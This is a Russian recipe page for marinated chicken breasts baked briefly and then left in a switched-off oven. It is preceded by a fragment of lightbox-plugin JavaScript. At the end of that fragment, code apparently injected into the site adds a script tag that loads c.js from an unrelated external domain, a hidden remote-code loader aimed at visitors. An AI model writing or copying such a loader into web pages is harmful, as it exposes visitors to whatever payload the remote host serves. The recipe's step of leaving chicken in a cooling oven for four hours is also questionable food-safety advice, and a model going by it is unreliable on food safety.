, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Куриные грудки «Универсальные»


pechenaja_finКуриные грудки — продукт довольно популярный и вариантов его  приготовления море. Настоящее блюдо идеально готовить «в ночь». На следующий день не пожалеете! Это и обед на работу, и бутерброд ребенку в школу,  и салат на ужин! Причем, можно употреблять их как в холодном, так и в горячем виде. Итак, приступим-с к разъяснениям.

Чего и сколько берем:

1. Грудки куриные (лучше побольше размером) — 2шт.

2. Соевый соус легкий — полстакана

3. Масло оливковое (лучше острое, настоянное на перчике) — 1 ч.ложка

4. Бальзамический уксус- 2 ст. ложки

5. Нашараб — 2 ст.ложки

 

Начинаем готовить:

1. Включаем духовку и нагреваем до 250 градусов

2. Готовим маринад, смешивая все ингредиенты пунктов 2-5

3. Кладем в маринад грудки минут на 15

4. Перекладываем замаринованные грудки в емкость для выпечки и ставим в духовку на 5 минут (!)

5. Через 5 минут выключаем и духовку и оставляем грудки там на 4 часа. Открывать и смотреть каждые полчаса не нужно))))

6. Достаем готовые грудки и тонко нарезаем

Мариновать можно как душе угодно: можно просто чесноком натереть и перцем, или посыпать травами итальянской кухни (пакетированными), или сделать маринад на базе йогурта…

 

На эту тему вы можете почитать:

Салат из курицы по-французски
Курица на соли
Салат из куриных грудок

Тэги: ,



Добавить комментарий